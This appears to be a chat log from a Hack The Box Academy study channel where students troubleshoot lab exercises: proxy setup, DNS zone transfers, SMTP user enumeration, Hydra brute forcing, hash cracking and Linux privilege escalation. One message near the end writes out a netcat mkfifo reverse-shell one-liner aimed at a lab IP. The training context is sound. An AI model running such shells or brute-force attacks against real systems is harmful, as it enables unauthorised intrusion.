Hey question to penetration testing career path students; I am a novice offsec student coming into the penetration testing career path with some very fundamental knowledge. I am not entirely new, I understand basic networking, linux, web vulnerabilities, etc... but I would still be considered a beginner by every standard. how difficult of a learning curve will this learning path be? a friend of mine tells be that it's significantly more comprehensive than OSCP and that it will be a challenge

How did you get Burp to work? I keep getting:

connect to 127.0.0.1 port 8080 failed: Connection refused

• Failed to connect to 127.0.0.1 port 8080 after 12 ms: Couldn't connect to server
• Closing connection
  curl: (7) Failed to connect to 127.0.0.1 port 8080 after 12 ms: Couldn't connect to server

Make sure the Proxy Listeners (Under proxy settings) is showing 127.0.0.1:8080 and the checkbox is checked for the Running column.

In the Windows Privilege Escalation module, Server Operators section, how do you crack the NTLM hash to get the Administrator password? I can crack the one on the page with both hashcat and crackstation but I not the one on the target that I retrieve with secretsdump.py.

Yup, that is set. I can use FoxyProxy through firefox with no issue.

what about /etc/proxychains.conf? Is http 127.0.0.1 8080 added and all other lines underneath the proxy list commented out?

Yes. The only thing different that I see is there is no proxychains.conf but there is a proxychains4.conf where I have made my edits. It reads from that config when running the command.

and you're using proxychains curl http://[server ip]:[port]?

Not 127.0.0.1, but for example: proxychains curl http://google.com

hi i read in here https://academy.hackthebox.com/module/143/section/1459 that later these methods to bypass AppLocker will be covered , searching around I do not see it in my unlocked CPTS path, any know where it is covered? thanks

└─$ proxychains curl http://www.google.com
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
curl: (7) Failed to connect to www.google.com port 80 after 3219 ms: Couldn't connect to server

Im honestly not sure, looks like you may using a different version of Proxychains (ver: 4?). Im currently using 3.1. I did find this:
https://unix.stackexchange.com/questions/624969/how-to-configure-proxychains-properly

Not the exact issue, but something similar

idk what is going on but you do not need proxychains for burpsuite

they are testing CMD line tools to use Burpsuite as a proxy, for the Module Using Web Proxies Section: Proxying Tools

make sure you have it in strictmode

the proxychains

Hey i was stuck with the same error yesterday

all i needed to do was keep burp suite intercept mode on before running the proxychains curl command

Silly me

lol that'll do it.

well that is shown in the section material

Yeah I have the intercept running

Strict_chain is enabled.

do you have any weird settings in the /etc/hosts file?

can you curl without proxychains?

Nothing out of the norm in the hosts file and I can curl without proxychains.

weird

Heck yeah!

Try netstat -anp | grep :8080 to see if you get anything

Nothing

ahh, something is wrong with Burpsuite then. Its not opening the port.

Have you already tried restarting Burp?

Yes as well as specifying the IP 127.0.0.1:8080 in the proxy listeners

do you have any other applications trying to use 8080? Maybe try a different port?

Switch and still nothing. I don't get it.

am i doing somethiing worng with my cmnds

?

You're using the wrong hash type. Try ||5600||

||5600 NetNTLMv2||

Ya its not making any sense. The port should show as open in the system, but its not. (using the netstat command). Only thing I can suggest would be to find out why Burp isn't opening the port.

Appreciate all your help G

damn

i taught im on 5600

my bad and thx

spoiler

Good day, all. Having trouble with Intro to Assembly Language final skill assessment question number 1 (Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'. )
I put the disassembled shellcode on the stack in assembler, looped over it while xoring each 8 bytes with rbx, printf'ed it, and tried connecting each 8byte shellcode pieces in both directions (meaning from beginning to the end and vice versa). No correct answer. Am i following right direction here...? Spent 2 days already on it.

How can i blure the image

who can help me this Open Beta Season III-Visual

ask that in #1157735501516779711

hey man, I know this a long ago post but I am doing this and I get one hit which is my existing user, I have used the -Force switch to tell it to keep going but it keeps stopping at the first match. Do you know if there is anything else other than the -Force switch that should be used?

this helps - thank you. I figured it out now

I am now stuck on the third question 'Find and submit the contents of the TXT record as the answer'
(https://academy.hackthebox.com/module/144/section/1256) - I performed a dig search on both of the previously identified zones on the name server, and the hint says that one of the existing zones contains a TXT record - but I found nothing other than an A record on one, and a SOA record on the other that links back to itself and the other zone

any pointers?

I tried doing zone transfers to find information but everything I tried so far has failed

not sure if you have this module unlocked, but it explained in more details about dns zone transfers. At least it helped me to answer the questions that you stuck onhttps://academy.hackthebox.com/module/112/section/1069

i cannot connect to the rdp

chow can i reach an techinical support

do a dns recon using dnsenum you will find some subdomains there is one that contains your answer

now im getting this

rdesktop 10.129.156.189 -u htb-student -p Academy_student_AD!

Put the password in single quotes

tried that same error

im getting black scree with xfreerdp

Try xfreerdp /v:10.129.156.189 /u:htb-student /p:'Academy_student_AD!'

black screen XD again

Black screen is fine

Just press enter lol

i did

i unistalled the xfreerdp

ill istall it and see

install *

🤔

and it worked

Was it black screen?

yeah

i needed to unistall

Use remmina

Hey g, you think it has to do with me using WSL?

lol ofc

Thanks

yes def, a lot of things do not run well using WSL

Thanks

In "Hacking Wordpress" in the Skills Assessment I get the following message after going for a wpscan: ```Scan Aborted: The remote website is up, but does not seem to be running WordPress.

I have a follow up question what if I do something that requires a password and I do not know it. how do I get out of it?

Look at the source code.
The main page is not a Wordpress, so the scan is aborted.

knowing the password

I meant I do not know the password and i did something by mistake that requires the passs. now if i use ctrl+C the reverse shell kills itself

how do i get out of the input password prompt without triggering the incorrect password or killing the shell

use an interactive shell

reverse shells are not a tty

i use the stty raw method

if it is a windows machine you better take a look at ConPtyShell

I have not yet touched a windows machine

Thanks, got it now. I know always "try harder" but I think sometimes these modules are really dumb, like never mention this within the first 10 sections and in the skills assessment you get thrown under the bus. This is not a learning experience this is straight up wasting ppls time and creating unneccessary frustation.. if I want to be frustrated by not knowing things and learn I go to HTB platform, not the academy

in the modules they explain you how to upgrade a shell to a tty

not your problem but had to let some steam off sry

good luck with the exam then

skill assessments are not meant to be the same as sections but use what you have seen on them

The module shows you how to find a Wordpress instance. In the skills assessments you can prove your knowledge.

It is important to understand why you are taking one step or another.
Taking the step is usually easy.

how long does it take for the xss session hijacking labs admin to review the request so it triggers the xss

2 seconds

dm me if help needed

is cbbh just more focused on web application side of things compare to cpts? Looks like cpts covers most of the cbbh stuff.

cbbh = web pentest, cpts = enterprise environment pentest (here you can find web apps running)

Is anyone able to call or something to help me with DNS questions? im having a really hard time understanding & im not sure what im doing wrong

bro I just tagged you earlier on where to read more

yes i know and I read it but im not sure what to do

just ask

we can help

Working on this module: https://academy.hackthebox.com/module/144/section/1256

Right now, working on the question that asks about the zones. I found that the answer is two, but I do not know what the second one is - I misunderstood what it was asking and got it right on accident.

As far as it seems to me, there is only one because I can dig the domain (ns.inlanefreight.htb) and I get the following:

; <<>> DiG 9.18.12-1-Debian <<>> any ns.inlanefreight.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37263
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;ns.inlanefreight.htb.          IN      ANY

;; ANSWER SECTION:
ns.inlanefreight.htb.   900     IN      SOA     ns1-etm.att.net. nomail.etm.att.net. 1 604800 3600 2419200 900

;; Query time: 1179 msec
;; SERVER: 192.168.1.254#53(192.168.1.254) (TCP)
;; WHEN: Wed Oct 04 12:13:40 PDT 2023
;; MSG SIZE  rcvd: 111

Due to there being only one SOA record, would that not mean that there is only one zone? I'm not sure how I would find the other zone

the academy student plan has practice machines or do I need to get htb vip sub?

academy is a different site

a zone is a set of subdomains

for record, the command I used is:
dig any ns.inlanefreight.htb

if you try axfr in all those subdomains you will find that another one is able to do axfr

then you have 2 zones

in all what subdomains though? i dont understand

you do axfr zone transfer in the zone provided in the exercise

right? are you there?

that returns some subdomains which means it is a zone

you can also do nslookup it gives you subdomains

i personally prefer dig

I keep getting communication errors as well, not sure why - it's pingable for me

└─$ dig axfr ns.inlanefreight.htb
;; communications error to 192.168.1.254#53: timed out
;; communications error to 192.168.1.254#53: timed out
;; communications error to 192.168.1.254#53: timed out

; <<>> DiG 9.18.12-1-Debian <<>> axfr ns.inlanefreight.htb
;; global options: +cmd
; Transfer failed.

yeah me too but i found the answer with nslookup and not with dig ahah

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

you have to tell the ip address

recheck the module

dig axfr ns.inlanefreight.htb @ip

which ip should I use though? ive been kind of stuck on that

the ip of the target?

the target

the ip of the target

the ip of the server in this case the target provided

└─$ dig axfr ns.inlanefreight.htb 10.129.218.66      

; <<>> DiG 9.18.12-1-Debian <<>> axfr ns.inlanefreight.htb 10.129.218.66
;; global options: +cmd
; Transfer failed.

you have a server with the dns port open usually 53

Getting transfer failed still, but it connected atleast

put an @ before the ip

I tried that too, same result

@ip

please i suggest you to take notes

about commands and all

well i tried the one with the @ too, but it gave the same thing

┌──(jeremy㉿kali)-[~]
└─$ dig axfr ns.inlanefreight.htb @10.129.218.66

; <<>> DiG 9.18.12-1-Debian <<>> axfr ns.inlanefreight.htb @10.129.218.66
;; global options: +cmd
; Transfer failed.

ns is not a zone, it is a NameServer

try other subdomains it's not the one

yea lol you have to specify the domain

dig axfr domain @server

you can specify a subdomain also but the one with the axfr enabled is told to you in the 1st question

try with nslookup

okay i got somewhere by just digging itself

nslookup -type=any -query=axfr inlanefreight.htb ip

gave me what looks like a zone file

yes i just got that now

cool

just trying to figure out where to go now

this means it is 1 zone

Why do you try a query with ANY when you request a zone transfer?

in the subdomains found there can be also another zone

the quick way is to just try axfr in all the discovered subdomains

it's just a habit and a copy and paste

you can use grep for this and make a loop

oh i got it

but i have a question

would this entry not mean that the 'internal.inlanefreight.htb' is the same machine that im interacting with? if so, why does digging inlanefreight.htb and digging internal.inlanefreight.htb yield different results

then ask

sent early lol

1 sec

meaning the same machine because of the loopback address

for ip in $(dig axfr inlanefreight.htb @10.129.216.178 | grep "10.10." | awk '{print $1}'); do sudo echo "10.129.216.178 $ip" >> /etc/hosts; done

for example this can help u

i already got the subdomain that had it but thank you

luckily it was near the top of the list or else id have to use that haha

need some help on SMTP attacking common services module

trying to answer the first question enumerating for usernames : Ive tried metasploit smtp user enum. ive tried smtp-user-enum ive tried telnet and openssl connect and hydra still no dice

what's your command for smtp-user-enum

smtp-user-enum -M RCPT -u users.list -D inlanefreight.htb -t 10.129.105.180

Keep in mind that certain servers may take a little longer to respond.

you put inlanefreight.htb in your hosts file

?

no

just tried that though still no dice

weird i just tried it work for me

showme your host file?

or the line you put in

i have the same thing

weird try to reboot the target

so sick of doing that with these labs its such a time waste

hang on

do a ping first to be sure when you boot a target

if it doesnt work

pinged it

stipll doesnt work though

WTF

and you put the new ip in your host file?

yup

yeah weird you should get your answer

check the time…

Query timeout is too short

the query timeout?

i set it to -w 180 too no dice

Why is username count 1?

not sure

theirs prob 50 usernames in the list

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 180 secs
Target domain ............ inlanefreight.htb

######## Scan started at Wed Oct 4 15:52:39 2023 #########
######## Scan completed at Wed Oct 4 15:52:39 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)

whoops

smtp-user-enum -M RCPT -u /root/Downloads/users.list -D inlanefreight.htb -t 10.129.149.47 -w 180

yeah

i am

even copied and pasted usernames into another list and tried stillno dice i dont get it

wow

still 1 username count?

figured it out

it was because i was using -u instead of -U

thats the most annoying thing in the world

180 sec?

between 5 and 180 is a big gap

ill be on suicide watch for the next 2 hours

yes, and the server kills the session in the meantime lol

Lmao that shit got me with hydra once. Was on -l instead of -L

imagine reading help panel

bout to email the creator and tell him to create and error for that lol

LOL i did

what error

u and U man 'they look the same capitalized

your useR was users.list

🤣

ya i was using -u instead of -U

lmao

glad u got it

no username would be users.list

this is my life

imagine if it would be

i actualyl see payloadbunny in teh forums lol

waht does my name show up as to yall

it says ChangeMe to me

it does

ya

anyone have a good email client can use for these labs

Evolution

Has anyone finished Introduction to Web Applications module, please? I'm stuck on question "Check the above login form for exposed passwords. Submit the password as the answer." in Sensitive Data Exposure section.

in #858470491676737536

oh right mb

enumerate what you can about the website

# Module: Password Attacks
# Section: Password Mutations

Tried Bruteforcing the FTP instead of SSH cuz its faster, it took me like 45mins but it came out empty. Can anybody give me length of the password so that i could filter the list and try again

Thank you

There's only one login form as an example with its comment with password test. Went through the entire source code.

look at the question carrefully : "Submit the password as the answer."

Use the lists and rules provided in resources

I did use the given list

Did you mutate it as described in the section?

of course i did

Also you can bump hydra threads to 48 relatively safely without false negative

I set it 64

i'm trying something new if that didnt work will set it to low and will try again

¯_(ツ)_/¯

I forget if you need to add the --local-auth flag

I definitely had false positives with 64 threads on hydra with ftp

I reran it with 32 or so and that worked

48 was my sweet spot

Roughly 10 minutes per on the long ones

The only password I found is test. That's incorrect answer though.

your section is : Sensitive Data Exposure?

Yes

show me the source code

dm

solved just enum better

also be careful with cached source code

ctrl shift R to hard refresh

That's the solution I found but doesn't accept the answer

trailing and leading spaces

double check that

@mossy hatch Can I dm?

yes

not sure if i can help tho

hi, I am stuck at privilege escalation. I am currently doing the knowledge check section of getting started module in cpts. the machine uses getsimple application. I did some digging and found out it was using getsimple 3.3.15. it has a RCE exploit of id CVE-2019-11231. I tried reading the blog but I got confused as to how should I use the api key. then I tried using the metasploit exploit I successfully gained the foothold then I tried running the LinPEAS and LinEnum scripts they both say that I can nopasswd on /usr/bin/php but when I try to access the directory I get permission denied

a little help please

gtfobins is your friend

you can run php as sudo without password is what that means

you can see it easier and quicker with sudo -l

yes I did that

but when I try to get in the directory I get permission denied

you did what?

https://gtfobins.github.io/gtfobins/php/#sudo

I tried sudo -l
I saw /usr/bin/php is nopasswd
I tried to add a reverse shell in the directory but it says permission denied

www-data@gettingstarted:/usr/bin$ ls -l php
ls -l php
lrwxrwxrwx 1 root root 21 Feb  9  2021 php -> /etc/alternatives/php
www-data@gettingstarted:/usr/bin$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.20 7969 > /tmp/f" >> php
<bin/sh -i 2>&1|nc 10.10.15.20 7969 > /tmp/f" >> php
bash: php: Permission denied

php isnt a directory

its an application

read the gobins entry on php

🥲

i cannot

Sorry I mistyped it directory

reread the module

it explains the privesc in the Nibblesmachine

and read the gobins entry on php closer

Yes I will do it

Thanks for the help

cause not to sound like a dick, but theres so many things wrong with your attempt there its hard to explain it all without nust spoiling the answer

but the biggest is that php is not a directory and directories have nothing to do with the situation

also information security foundations path gonna give u a lot of valuable information

do it before Getting Started (in pentesting) module

....

did you cd into php?...🥹

That's deep...

Module: Broken Authentication
Section: Predictable Reset Token
Question:
Create a token on the web application exposed at subdirectory /question1/ using the *Create a reset token for htbuser* button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

Am I supposed to make my own script?

yez

you can use the php script from the section also

what i did was a custom Python script that triggers the htbuser token generation and after that sends all the possible htbadmin tokens via post (all those from +-1 second)

and if it finds Wrong in response text it just keep trying and if it doesn’t find it returns the response text and break the loop

Thanks a bunch @sly dome

any time

Did anyone ever have issues with data showing up in elastic on Security Monitoring & SIEM Fundamentals

Anyone have some wisdom for me in the Password Attacks Module? Attacking network services at the moment and Hydra is quoting me ~21 hours to finish a bruteforce. Unfortunately, I can extend neither the PwnBox or the target system that long. The restore file also seems to only start me back where I started, and not where I left off. Anything you guys have got would be appreciated. Thanks!

This is under the "Password Mutations" section of the module.

Hi there,

im doing the web enumeration module in the penetration path and it is asking me to add a DNS server such as 1.1.1.1 to /etc/resolv.conf file

im having a hard time figuring out how to do it and was hoping for some guidance

don't brute force SSH basically, too slow

...